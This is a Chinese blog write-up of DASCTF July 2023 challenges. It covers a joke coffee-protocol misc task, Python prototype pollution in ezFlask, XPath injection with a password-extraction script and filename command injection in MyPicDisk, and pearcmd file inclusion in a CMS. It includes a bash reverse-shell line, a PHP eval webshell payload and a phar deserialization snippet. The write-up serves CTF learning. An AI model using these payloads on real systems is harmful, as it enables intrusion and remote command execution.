[DASCTF7月赛](未完待续~)

最新推荐文章于 2023-08-05 19:44:06 发布
最新推荐文章于 2023-08-05 19:44:06 发布
阅读量145 收藏
点赞数
分类专栏: wp CTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/131899121
版权
CTF 同时被 2 个专栏收录
30 篇文章 2 订阅
订阅专栏
wp
23 篇文章 1 订阅
订阅专栏

文章目录

[DASCTF7月赛]

misc

Coffee desu!

hint1: Strange Protocol

image-20230724154636387

经过搜索,发现这个是一种恶搞协议:image-20230724155819170

自定义了一些请求方式

image-20230724155830547

结合首页英文:

You should add the milktea before getting the coffee!

我们需要使用BREW向服务器添加milktea

image-20230724155935139

返回:

The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.

image-20230724160051850

这个协议定义了:Accept-Additions头,于是我们添加上:milktea

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lIom1W9e-1690186880997)(https://raw.githubusercontent.com/leekosss/photoBed/master/202307241601658.png)]

添加之后我们使用GET将其取出:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oQim0STO-1690186880998)(https://raw.githubusercontent.com/leekosss/photoBed/master/202307241602098.png)]

web

ezFlask

源码:

import uuid

from flask import Flask, request, session
from secret import black_list
import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def check(data):
    for i in black_list:
        if i in data:
            return False
    return True

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

class user():
    def __init__(self):
        self.username = ""
        self.password = ""
        pass
    def check(self, data):
        if self.username == data['username'] and self.password == data['password']:
            return True
        return False

Users = []

@app.route('/register',methods=['POST'])
def register():
    if request.data:
        try:
            if not check(request.data):
                return "Register Failed"
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Register Failed"
            User = user()
            merge(data, User)
            Users.append(User)
        except Exception:
            return "Register Failed"
        return "Register Success"
    else:
        return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
    if request.data:
        try:
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Login Failed"
            for user in Users:
                if user.check(data):
                    session["username"] = data["username"]
                    return "Login Success"
        except Exception:
            return "Login Failed"
    return "Login Failed"

@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5010)

这是一个flask框架的题,根路由是一个读文件函数,读取__file__里面的内容(源码),显示到首页

有一个check函数:遍历一下data中的值,如果在黑名单中就返回false,否则返回true

定义了一个user类,成员变量usernamepassword初值为空,类中定义了一个check函数,如果与输入的data中的相等才返回true

写了一个merge函数,这个函数是重点:

这个函数的作用是将两个字典对象 srcdst 进行合并。它逐个遍历 src 中的键值对,并根据一定的规则将其合并到 dst 中。

具体来说,函数执行以下操作:

  1. 对于 src 中的每个键值对 (k, v):

    • 如果 dst 是一个可索引的对象(如字典),并且 dst 中存在键 k,并且值类型 v 是字典类型,则使用递归调用 merge(v, dst[k])vdst[k] 进行合并。
    • 否则,将 v 赋值给 dst 的键 k

  2. 如果 dst 不是可索引的对象,而是一个具有属性的对象,则对于 src 中的每个键值对 (k, v):

    • 如果 dst 拥有属性 k,并且值类型 v 是字典类型,则使用递归调用 merge(v, getattr(dst, k))vdst 的属性 k 进行合并。
    • 否则,将 v 设置为 dst 的属性 k

简而言之,该函数通过递归地合并两个字典对象的键值对,将 src 中的内容合并到 dst 中,确保最终的 dst 包含 src 的所有键值对。

需要注意的是,该函数对于嵌套的字典结构特别有用,因为它可以处理深层嵌套的情况。但请注意在使用时确保 srcdst 的数据结构是可变的(mutable),否则可能会导致意外的结果。

register路由:json类型数据需要通过check()函数检查,如果其中没有usernamepassword则失败,否则创建一个用户,将data字典中的数据,添加到User字典中

这里主要需要关注这些代码

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
            
           
@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()

这个题目乍一眼看好像无从下手,没有漏洞点,但是这里会产生类似覆盖的效果

经过搜索,知道了这是: Python原型链污染

文章里详细的讲述了,可以污染类中的属性值:

image-20230723230853867

这里我们截取到一段利用的payload:

{
    "__init__" : {
        "__globals__" : {
            "app" : {
                "config" : {
                    "SECRET_KEY" :"Polluted~"
                }
            }
        }
    }
}

这一段代码可以通过merge()自定义函数,污染flask中的SECRET_KEY

我们重新回到题目,分析一下我们实际可以污染根路由的文件的__file__属性,如果控制了这里就可以实现任意文件读取了

我们仿照上面的payload,构造出如下payload:

{
	"__init__": { 
        "__globals__": {
            "__file__":"app.py"
        }
    },
    "username":"admin",
    "password":"123"
}

这样就可以将__file__污染为app.py了,

但是经过尝试,发现失败了,原因是check()函数把__init__过滤了,没法用了

但是我们可以尝试编码绕过,json中可以使用unicode编码,我们使用cyberchef编码一下:

__init__

\u005F\u005F\u0069\u006E\u0069\u0074\u005F\u005F

这样就可以绕过了,然后非预期就是读一下/proc/1/environ得到flag:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Mzss4X4f-1690186881000)(https://raw.githubusercontent.com/leekosss/photoBed/master/202307232323420.png)]

image-20230723232318074

预期解是通过任意文件读取,伪造flask的pin码,然后命令执行查询到flag

MyPicDisk

首先通过万能密码登录:

' or 1 or '1

但是这里需要在用户名处输入:

image-20230724134855252

下载:/y0u_cant_find_1t.zip

得到:index.php

<?php
session_start();
error_reporting(0);
class FILE{
    public $filename;
    public $lasttime;
    public $size;
    public function __construct($filename){
        if (preg_match("/\//i", $filename)){
            throw new Error("hacker!");
        }
        $num = substr_count($filename, ".");
        if ($num != 1){
            throw new Error("hacker!");
        }
        if (!is_file($filename)){
            throw new Error("???");
        }
        $this->filename = $filename;
        $this->size = filesize($filename);
        $this->lasttime = filemtime($filename);
    }
    public function remove(){
        unlink($this->filename);
    }
    public function show()
    {
        echo "Filename: ". $this->filename. "  Last Modified Time: ".$this->lasttime. "  Filesize: ".$this->size."<br>";
    }
    public function __destruct(){
        system("ls -all ".$this->filename);
    }
}
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>MyPicDisk</title>
</head>
<body>
<?php
if (!isset($_SESSION['user'])){
  echo '
<form method="POST">
    username:<input type="text" name="username"></p>
    password:<input type="password" name="password"></p>
    <input type="submit" value="登录" name="submit"></p>
</form>
';
  $xml = simplexml_load_file('/tmp/secret.xml');
  if($_POST['submit']){
    $username=$_POST['username'];
    $password=md5($_POST['password']);
    $x_query="/accounts/user[username='{$username}' and password='{$password}']";
    $result = $xml->xpath($x_query);
    if(count($result)==0){
      echo '登录失败';
    }else{
      $_SESSION['user'] = $username;
        echo "<script>alert('登录成功!');location.href='/index.php';</script>";
    }
  }
}
else{
    if ($_SESSION['user'] !== 'admin') {
        echo "<script>alert('you are not admin!!!!!');</script>";
        unset($_SESSION['user']);
        echo "<script>location.href='/index.php';</script>";
    }
  echo "<!-- /y0u_cant_find_1t.zip -->";
  if (!$_GET['file']) {
    foreach (scandir(".") as $filename) {
      if (preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        echo "<a href='index.php/?file=" . $filename . "'>" . $filename . "</a><br>";
      }
    }
    echo '
  <form action="index.php" method="post" enctype="multipart/form-data">
  选择图片:<input type="file" name="file" id="">
  <input type="submit" value="上传"></form>
  ';
    if ($_FILES['file']) {
      $filename = $_FILES['file']['name'];
      if (!preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        die("hacker!");
      }
      if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)) {
          echo "<script>alert('图片上传成功!');location.href='/index.php';</script>";
      } else {
        die('failed');
      }
    }
  }
  else{
      $filename = $_GET['file'];
      if ($_GET['todo'] === "md5"){
          echo md5_file($filename);
      }
      else {
          $file = new FILE($filename);
          if ($_GET['todo'] !== "remove" && $_GET['todo'] !== "show") {
              echo "<img src='../" . $filename . "'><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=remove'>remove</a><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=show'>show</a><br>";
          } else if ($_GET['todo'] === "remove") {
              $file->remove();
              echo "<script>alert('图片已删除!');location.href='/index.php';</script>";
          } else if ($_GET['todo'] === "show") {
              $file->show();
          }
      }
  }
}
?>
</body>
</html>

这里很明显需要知道:admin的密码才能够完成后续操作,

我们注意到这里:

$xml = simplexml_load_file('/tmp/secret.xml');
  if($_POST['submit']){
    $username=$_POST['username'];
    $password=md5($_POST['password']);
    $x_query="/accounts/user[username='{$username}' and password='{$password}']";
    $result = $xml->xpath($x_query);
    if(count($result)==0){
      echo '登录失败';
    }else{
      $_SESSION['user'] = $username;
        echo "<script>alert('登录成功!');location.href='/index.php';</script>";
    }

这里对用户名处没有任何过滤就进行xpath查询,所以会导致xpath注入

xpath注入学习文章:https://xz.aliyun.com/t/7791?page=1#toc-0

由于这里密码被md5加密了,所以我们可以猜测密码为32位:

xpath查询语句如下:string-length代表查询字符串的长度

' or string-length((//user[position()=1]/password[position()=1]))=32 or '

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ii5yHL6c-1690186881002)(https://raw.githubusercontent.com/leekosss/photoBed/master/202307241356669.png)]

查询一下确实为32位

接下来写脚本查询password的值即可:

import string
import time
import requests

s = string.printable

url = "http://d27bfc8b-3545-410a-9e7a-7446c02e9290.node4.buuoj.cn:81/index.php"
flag = ""

for i in range(1, 100):
    for j in s:
        time.sleep(0.1)
        payload = "' or substring((//user[position()=1]/password[position()=1]),{},1)='{}' or '".format(i,j)
        data = {
            "username": payload,
            "password": "123",
            "submit": "%E7%99%BB%E5%BD%95"
        }
        res = requests.post(url, data=data)
        # print(res.text)
        if "成功" in res.text:
            flag += j
            print(flag)
            break
            
# 003d7628772d6b57fec5f30ccbc82be1

使用:https://www.somd5.com/解密:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ebcOpDAO-1690186881003)(https://raw.githubusercontent.com/leekosss/photoBed/master/202307241359303.png)]

15035371139

接下来登录就可以文件上传了:

文件上传为白名单waf:

if (!preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        die("hacker!");
      }

FILE类中会对文件名进行检测,不能包含/和多个小数点

析构方法中命令执行:

public function __destruct(){
        system("ls -all ".$this->filename);
    }

我们可以利用它来反弹shell,首先上传一个文件名为:;a.jpg,内容为:

bash -i>& /dev/tcp/ip/9996 0>&1

然后再上传一个文件:;bash *a.jpg

点击这个文件就可以反弹shell了

也可以phar反序列化,没复现成功

<?php

class FILE{
    public $filename;
    public $lasttime;
    public $size;
    public function __construct($filename){
        $this->filename = $filename;
    }
}

$a = new FILE("/;cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd");
$phartest=new phar('phartest.phar',0);
$phartest->startBuffering();
$phartest->setMetadata($a);
$phartest->setStub("<?php __HALT_COMPILER();?>");
$phartest->addFromString("test.txt","test");
$phartest->stopBuffering();
ez_cms

熊海cms

image-20230724153506508

经过查询得知,熊海cms首页存在文件包含漏洞:

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

于是我们只要包含一个有用的文件即可,但这个有用的文件是什么呢?

这个文件是pearcmd.php,通过包含这个文件可以实现向服务器上写入shell进行rce的操作

可以参考:

  • https://tttang.com/archive/1312/#toc_0x06-pearcmdphp

  • https://y4tacker.github.io/2022/06/19/year/2022/6/%E5%85%B3%E4%BA%8Epearcmd%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/#%E5%88%A9%E7%94%A8

image-20230724154032451

我们直接构造:(注意顺序)

/?+config-create+/&r=../../../../../../../../../../../../usr/share/php/pearcmd&/<?=phpinfo();eval($_POST[1]);?>+/tmp/leekos.php

这里需要通过相对路径来找到pearcmd.php(注意最后不需要加上.php

image-20230724154105538

成功写入,然后蚁剑包含拿flag

Leekos
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux服务器性能调优文档(未完待续
07-23
教程名称:linux服务器性能调优文档(未完待续)课程目录:linux服务器性能调优01linux服务器性能调优02linux服务器性能调优03linux服务器性能调优04linux服务器性能调优05linux服务器性能调优06linux服务器性能调优07linux服务器性能调优08linux服务器性能调优09linux服务器性能调优10linux服务器性能调优11linux服务器性能调优12li 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
DASCTF 2023 & 0X401七月暑期挑战赛 webEzFlask
m0_63138919的博客
08-30 229
1
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
Jay17的博客
08-05 1286
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
哈哥的博客阅读指南,一文对接全链路导引 --- 未完待续~
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
06-09 1万+
不知不觉,深耕技术博客已经度过很多时间了~ 技术专栏,社区板块也做了很多,我决定写一篇文章,专门用于指南作为阅读导引,接下来请小伙伴花费十分钟的时间,了解一下该导引指南。
笔记整理:狂神说Java--Java基础(未完待续~)
qq_44891883的博客
05-03 403
笔记整理:狂神说Java–Java基础(未完待续~) 笔记参考:b站狂神说java 视频链接:https://www.bilibili.com/video/BV12J41137hu?p=1 本篇是简短一个合集,如有需要了解某一部分,可根据目录跳转 - 笔记整理:狂神说java——java基础00 - 笔记整理:狂神说Java——Java基础01 笔记整理:狂神说Java——Java基础02 笔记整理:狂神说Java——Java基础03 未完待续。。。 ...
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
HZNUCTF-ezflask
qq_44640313的博客
03-27 549
jinja2的注入
SSTI Flask做题记录1
Firebasky的博客
10-12 992
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
buuctf--easyflask
qq_46263951的博客
01-04 868
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
HZNUCTF2023 web
weixin_63231007的博客
05-07 1326
HZNUCTF校赛 赛后复现
2015年高中语文优秀作文青春未完待续…素材
08-06
2015年高中语文优秀作文青春未完待续…素材
9--[小黑点的旅行(未完待续)].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-16
9--[小黑点的旅行(未完待续)].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码9--[小黑点的旅行(未完待续)].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码9--[小黑点的旅行(未完待续)].zip...
大数据实战第一部分(未完待续
12-19
这是一个完整的项目的部分内容请先按照相关教程自主搭建相关的平台并完成软件的下载、安装和配置
scratch2源码小黑点的旅行(未完待续)
最新发布
05-30
scratch2源码小黑点的旅行(未完待续)提取方式是百度网盘分享地址
HSCSEC 2023 个人练习
weixin_44770698的博客
02-19 704
HSCSEC 2023 练习
GACTF2020 simpleflask& EZFLASK
汗的博客
09-03 1359
信息收集 直接访问,提示方法不允许 使用burpsuite,右键-change request method 提示了个name,猜测是参数 因为题目是flask,容易想到ssti,直接试name={{2*2}} 再试,因为可能是有过滤、waf之类的name={{2-2}},可以看到2-2有了结果 可以确定是存在ssti的,接下来就是具体的bypass和get flag了 bypass&利用 用burp进行一次fuzz,还做不到颅内ctf,以下是一个简单的fuzz字符list [ ] ( \
DASCTF 2023 & 0X401七月暑期挑战赛web复现
weixin_63231007的博客
08-02 1044
python原型链污染&xpath注入&pearcmd文件包含&django框架
Flask(四)
qq_60381063的博客
09-11 243
2,session:session和cookie的作用有点类似,都是为了存储用户相关的信息,不同的是,cookie是存储在本地浏览器,session是一个思路、一个概念、一个服务器存储授权信息的解决方案,不同的服务器,不同的框架,不同的语言有不同的实现,虽然实现不同,但是他们的目的都是服务器为了方便存储数据的,session的出现,是为了解决cookie存储数据不安全的问题。wtforms表单的两个主要功能是验证用户提交数据的合法性以及渲染模板,当然还包括一些其他功能:CSRF保护、文件上传等。
NUAACTF - Web - Ez_Flask
1tachi的博客
12-27 584
按照提示随便传一个:?name=123 可能存在模板渲染,检测一下:?name=${2*7} ?name={{7*7}} ?name={{7*'7'}} 发现是 jinja2 渲染 看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}} 可以一点一点的往下找,也可以直接写payload {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
java 泛型 父类_java泛型基础、子类泛型不能转换成父类泛型--未完待续
05-12
在Java中,泛型是一种强类型机制,它可以让你在编译时检查类型错误,从而提高代码的安全性和可读性。在使用泛型时,我们经常会遇到父类和子类的泛型转换问题。 首先,我们需要明确一点:子类泛型不能转换成父类泛型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值